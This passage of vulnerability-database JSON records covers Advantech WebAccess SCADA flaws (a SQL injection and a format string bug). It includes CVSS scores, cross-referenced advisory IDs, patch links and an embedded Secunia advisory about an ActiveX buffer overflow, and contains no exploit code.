Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of IOCTL 0x00013c71 in BwWebSvc.dll. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Advantech WebAccess is a browser-based SCADA software package for monitoring, data acquisition, and visualization. It is used to automate complex industrial processes when remote operation is required. The vulnerability is caused by the program not properly sanitizing user input", "sources": [ { "db": "NVD", "id": "CVE-2020-12014" }, { "db": "JVNDB", "id": "JVNDB-2020-005144" }, { "db": "ZDI", "id": "ZDI-20-615" }, { "db": "ZDI", "id": "ZDI-20-613" }, { "db": "ZDI", "id": "ZDI-20-614" }, { "db": "CNVD", "id": "CNVD-2020-29741" }, { "db": "IVD", "id": "c69f120f-13c6-4366-bc67-15c6b3fa728e" }, { "db": "IVD", "id": "dc75839d-760d-4e08-87b4-f1096616019c" }, { "db": "VULHUB", "id": "VHN-164650" }, { "db": "VULMON", "id": "CVE-2020-12014" } ], "trust": 4.59 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2020-12014", "trust": 5.7 }, { "db": "ICS CERT", "id": "ICSA-20-128-01", "trust": 3.2 }, { "db": "ZDI", "id": "ZDI-20-613", "trust": 2.5 }, { "db": "ZDI", "id": "ZDI-20-615", "trust": 1.4 }, { "db": "CNVD", "id": "CNVD-2020-29741", "trust": 1.1 }, { "db": "CNNVD", "id": "CNNVD-202005-299", "trust": 1.1 }, { "db": "ZDI", "id": "ZDI-20-614", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU93292753", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2020-005144", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9884", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9882", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-9883", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2020.1646", "trust": 0.6 }, { "db": "NSFOCUS", "id": "47352", "trust": 0.6 }, { "db": "IVD", "id": "C69F120F-13C6-4366-BC67-15C6B3FA728E", "trust": 0.2 }, { "db": "IVD", "id": "DC75839D-760D-4E08-87B4-F1096616019C", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-164650", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2020-12014", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "c69f120f-13c6-4366-bc67-15c6b3fa728e" }, { "db": "IVD", "id": "dc75839d-760d-4e08-87b4-f1096616019c" }, { "db": "ZDI", "id": "ZDI-20-615" }, { "db": "ZDI", "id": "ZDI-20-613" }, { "db": "ZDI", "id": "ZDI-20-614" }, { "db": "CNVD", "id": "CNVD-2020-29741" }, { "db": "VULHUB", "id": "VHN-164650" }, { "db": "VULMON", "id": "CVE-2020-12014" }, { "db": "JVNDB", "id": "JVNDB-2020-005144" }, { "db": "CNNVD", "id": "CNNVD-202005-299" }, { "db": "NVD", "id": "CVE-2020-12014" } ] }, "id": "VAR-202005-0337", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "c69f120f-13c6-4366-bc67-15c6b3fa728e" }, { "db": "IVD", "id": "dc75839d-760d-4e08-87b4-f1096616019c" }, { "db": "CNVD", "id": "CNVD-2020-29741" }, { "db": "VULHUB", "id": "VHN-164650" } ], "trust": 1.679503486666667 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "c69f120f-13c6-4366-bc67-15c6b3fa728e" }, { "db": "IVD", "id": "dc75839d-760d-4e08-87b4-f1096616019c" }, { "db": "CNVD", "id": "CNVD-2020-29741" } ] }, "last_update_date": "2024-11-23T21:59:18.257000Z", "patch": { "_id": null, "data": [ { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 2.1, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-36" }, { "title": "Top Page", "trust": 0.8, "url": "https://www.advantech.com/" }, { "title": "Patch for Advantech WebAccess Node SQL injection vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/218849" }, { "title": "Advantech WebAccess Node SQL Repair measures for injecting vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=118218" } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-615" }, { "db": "ZDI", "id": "ZDI-20-613" }, { "db": "ZDI", "id": "ZDI-20-614" }, { "db": "CNVD", "id": "CNVD-2020-29741" }, { "db": "JVNDB", "id": "JVNDB-2020-005144" }, { "db": "CNNVD", "id": "CNNVD-202005-299" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-89", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-164650" }, { "db": "JVNDB", "id": "JVNDB-2020-005144" }, { "db": "NVD", "id": "CVE-2020-12014" } ] }, "references": { "_id": null, "data": [ { "trust": 3.8, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "trust": 2.1, "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-36" }, { "trust": 1.8, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-613/" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12014" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-12014" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu93292753/" }, { "trust": 0.7, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-615/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.1646/" }, { "trust": 0.6, "url": "http://www.nsfocus.net/vulndb/47352" }, { "trust": 0.1, "url": "https://www.zerodayinitiative.com/advisories/zdi-20-614/" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/89.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/181600" } ], "sources": [ { "db": "ZDI", "id": "ZDI-20-615" }, { "db": "ZDI", "id": "ZDI-20-613" }, { "db": "ZDI", "id": "ZDI-20-614" }, { "db": "CNVD", "id": "CNVD-2020-29741" }, { "db": "VULHUB", "id": "VHN-164650" }, { "db": "VULMON", "id": "CVE-2020-12014" }, { "db": "JVNDB", "id": "JVNDB-2020-005144" }, { "db": "CNNVD", "id": "CNNVD-202005-299" }, { "db": "NVD", "id": "CVE-2020-12014" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "c69f120f-13c6-4366-bc67-15c6b3fa728e", "ident": null }, { "db": "IVD", "id": "dc75839d-760d-4e08-87b4-f1096616019c", "ident": null }, { "db": "ZDI", "id": "ZDI-20-615", "ident": null }, { "db": "ZDI", "id": "ZDI-20-613", "ident": null }, { "db": "ZDI", "id": "ZDI-20-614", "ident": null }, { "db": "CNVD", "id": "CNVD-2020-29741", "ident": null }, { "db": "VULHUB", "id": "VHN-164650", "ident": null }, { "db": "VULMON", "id": "CVE-2020-12014", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2020-005144", "ident": null }, { "db": "CNNVD", "id": "CNNVD-202005-299", "ident": null }, { "db": "NVD", "id": "CVE-2020-12014", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2020-05-07T00:00:00", "db": "IVD", "id": "c69f120f-13c6-4366-bc67-15c6b3fa728e", "ident": null }, { "date": "2020-05-07T00:00:00", "db": "IVD", "id": "dc75839d-760d-4e08-87b4-f1096616019c", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-615", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-613", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-614", "ident": null }, { "date": "2020-05-25T00:00:00", "db": "CNVD", "id": "CNVD-2020-29741", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "VULHUB", "id": "VHN-164650", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "VULMON", "id": "CVE-2020-12014", "ident": null }, { "date": "2020-06-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-005144", "ident": null }, { "date": "2020-05-07T00:00:00", "db": "CNNVD", "id": "CNNVD-202005-299", "ident": null }, { "date": "2020-05-08T12:15:11.253000", "db": "NVD", "id": "CVE-2020-12014", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-615", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-613", "ident": null }, { "date": "2020-05-08T00:00:00", "db": "ZDI", "id": "ZDI-20-614", "ident": null }, { "date": "2020-05-25T00:00:00", "db": "CNVD", "id": "CNVD-2020-29741", "ident": null }, { "date": "2020-05-11T00:00:00", "db": "VULHUB", "id": "VHN-164650", "ident": null }, { "date": "2020-05-11T00:00:00", "db": "VULMON", "id": "CVE-2020-12014", "ident": null }, { "date": "2020-06-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2020-005144", "ident": null }, { "date": "2020-12-31T00:00:00", "db": "CNNVD", "id": "CNNVD-202005-299", "ident": null }, { "date": "2024-11-21T04:59:07.050000", "db": "NVD", "id": "CVE-2020-12014", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202005-299" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Node SQL injection vulnerability", "sources": [ { "db": "CNVD", "id": "CNVD-2020-29741" }, { "db": "CNNVD", "id": "CNNVD-202005-299" } ], "trust": 1.2 }, "type": { "_id": null, "data": "SQL injection", "sources": [ { "db": "IVD", "id": "c69f120f-13c6-4366-bc67-15c6b3fa728e" }, { "db": "IVD", "id": "dc75839d-760d-4e08-87b4-f1096616019c" }, { "db": "CNNVD", "id": "CNNVD-202005-299" } ], "trust": 1.0 } }
var-201202-0222
Vulnerability from variot
Format string vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary code via format string specifiers in a message string. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/
TITLE: Advantech OPC Server ADAM ActiveX Control Buffer Overflow Vulnerability
SECUNIA ADVISORY ID: SA46775
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46775/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
RELEASE DATE: 2011-11-07
DISCUSS ADVISORY: http://secunia.com/advisories/46775/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/46775/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in Advantech OPC Server, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in the ADAM ActiveX control and can be exploited to cause a buffer overflow.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in the following components: * Advantech ADAM OPC Server versions prior to V3.01.012. * Advantech Modbus RTU OPC Server versions prior to V3.01.010. * Advantech Modbus TCP OPC Server versions prior to V3.01.010.
SOLUTION: Reportedly a patch has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Security Research and Service Institute Information and Communication Security Technology Center (ICST).
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0222", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "19a73622-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0672" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001560" }, { "db": "CNNVD", "id": "CNNVD-201202-418" }, { "db": "NVD", "id": "CVE-2012-0242" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001560" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sense Vulnerability Coordination Team, Greg MacManus of iSIGHT Partners, Kuang-Chun Hung of Security Research and Service Institute-Information and Communication Security Technology Center (ICST), Luigi Auriemma, and\nSnake (alias).", "sources": [ { "db": "BID", "id": "52051" } ], "trust": 0.3 }, "cve": "CVE-2012-0242", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2012-0242", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 7.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2012-0242", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "19a73622-2354-11e6-abef-000c29c66e3d", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-53523", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2012-0242", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2012-0242", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-201202-418", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "19a73622-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-53523", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "19a73622-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53523" }, { "db": "JVNDB", "id": "JVNDB-2012-001560" }, { "db": "CNNVD", "id": "CNNVD-201202-418" }, { "db": "NVD", "id": "CVE-2012-0242" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Format string vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary code via format string specifiers in a message string. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. \nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------\n\nOvum says ad hoc tools are out-dated. The best practice approach?\nFast vulnerability intelligence, threat handling, and setup in one tool. \n\nRead the new report on the Secunia VIM:\nhttp://secunia.com/products/corporate/vim/ovum_2011_request/ \n\n----------------------------------------------------------------------\n\nTITLE:\nAdvantech OPC Server ADAM ActiveX Control Buffer Overflow\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA46775\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46775/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nRELEASE DATE:\n2011-11-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46775/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46775/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Advantech OPC Server, which can\nbe exploited by malicious people to compromise a user\u0027s system. \n\nThe vulnerability is caused due to an error in the ADAM ActiveX\ncontrol and can be exploited to cause a buffer overflow. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nThe vulnerability is reported in the following components:\n* Advantech ADAM OPC Server versions prior to V3.01.012. \n* Advantech Modbus RTU OPC Server versions prior to V3.01.010. \n* Advantech Modbus TCP OPC Server versions prior to V3.01.010. \n\nSOLUTION:\nReportedly a patch has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nICS-CERT credits Security Research and Service Institute Information\nand Communication Security Technology Center (ICST). \n\nORIGINAL ADVISORY:\nICS-CERT:\nhttp://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2012-0242" }, { "db": "JVNDB", "id": "JVNDB-2012-001560" }, { "db": "CNVD", "id": "CNVD-2012-0672" }, { "db": "BID", "id": "52051" }, { "db": "IVD", "id": "19a73622-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53523" }, { "db": "PACKETSTORM", "id": "106765" } ], "trust": 2.79 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-53523", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-53523" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-0242", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 2.3 }, { "db": "BID", "id": "52051", "trust": 1.4 }, { "db": "CNNVD", "id": "CNNVD-201202-418", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2012-0672", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001560", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-11-279-01", "trust": 0.4 }, { "db": "IVD", "id": "19A73622-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "SECUNIA", "id": "46775", "trust": 0.2 }, { "db": "EXPLOIT-DB", "id": "17772", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-53523", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "106765", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "19a73622-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0672" }, { "db": "VULHUB", "id": "VHN-53523" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001560" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-418" }, { "db": "NVD", "id": "CVE-2012-0242" } ] }, "id": "VAR-201202-0222", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "19a73622-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0672" }, { "db": "VULHUB", "id": "VHN-53523" } ], "trust": 1.551177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "19a73622-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0672" } ] }, "last_update_date": "2024-11-23T21:46:31.560000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "WebAccess", "trust": 0.8, "url": "http://www.broadwin.com/features.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Patch for Advantech WebAccess Format String Vulnerability (CNVD-2012-0672)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/10415" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0672" }, { "db": "JVNDB", "id": "JVNDB-2012-001560" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-134", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001560" }, { "db": "NVD", "id": "CVE-2012-0242" } ] }, "references": { 